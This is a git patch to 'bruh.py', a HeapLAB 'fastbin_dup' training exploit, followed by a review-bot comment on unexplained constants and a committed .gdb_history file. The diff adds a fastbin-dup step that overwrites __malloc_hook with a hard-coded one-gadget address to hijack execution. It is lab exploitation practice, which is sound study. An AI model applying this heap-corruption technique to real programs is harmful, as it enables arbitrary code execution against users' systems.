From 93f5247d9c37732846b0d88136b2ce1908b361be Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Mon, 4 Jan 2021 20:25:35 -0600
Subject: modified: HeapLAB/challenge-fastbin_dup/.gdb_history modified: HeapLAB/challenge-fastbin_dup/bruh.py
---
 HeapLAB/challenge-fastbin_dup/bruh.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
(limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
 #8 * 9
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
 malloc(119, p64(0)*9 + p64(payload_loc))
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+print("onegadget: {}".format(hex(onegadget)))
 print("top chunk addr: {}".format(hex(payload_loc)))
 # =============================================================================
--
cgit v1.2.3
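Review bot: The added `onegadget = libc.address + 0xe1fa1` line hard-codes an offset that is only meaningful for one specific libc build, and neither it nor the `72` and `35` literals on the following `malloc(...)` line are explained; the two new comments (`#definetly the right thing`, `#we now have things in place and shit`) record no reasoning a later reader could check. Naming the constant and tying it to the binary it was measured against would keep the lab script reproducible, e.g. `ONE_GADGET_OFFSET = 0xe1fa1  # valid only for the libc shipped with this challenge; re-derive if the binary changes`. The unchanged `print("top chunk addr: ...")` next to the new print reports `payload_loc`, so its label looks misleading beside the new output. The subject line says `.gdb_history` was modified in the same commit; debugger history is local state and can capture paths or typed values, so it is better kept out of the repository via `.gitignore`. This is a flat script that continues outside the hunk on both sides.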